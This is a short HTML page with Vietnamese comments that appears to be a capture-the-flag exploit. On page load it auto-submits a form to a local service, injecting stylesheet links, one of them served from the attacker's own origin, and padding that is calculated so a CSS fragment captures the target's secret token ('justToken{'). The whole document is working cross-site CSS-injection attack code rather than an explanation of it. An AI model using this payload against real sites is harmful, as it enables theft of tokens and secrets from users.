<form action="http://127.0.0.1:80/tasks/0" method="POST" id="f">
  <textarea name="content"></textarea>
</form>
<script>
  // chuỗi mở đầu và stylesheet thứ 2 của bạn (server của bạn phục vụ /css)
  const prev = `<link rel=stylesheet href=/tasks><link rel=stylesheet href=${location.origin}/css>}`;
  // ta muốn xuất hiện "justToken{" ngay sau dấu ",\n"
  const flag = 'justToken{';
  // 500 - flag.length - 11 - prev.length:
  //  - flag.length: số ký tự cần ăn vào từ token
  //  - 11: đếm cho ",\n" (2) + "{}*{--x:" (9)
  const payload = `${prev}${'a'.repeat(500 - flag.length - 11 - prev.length)}{}*{--x:`;
  f.content.value = payload;
  f.submit();
</script>
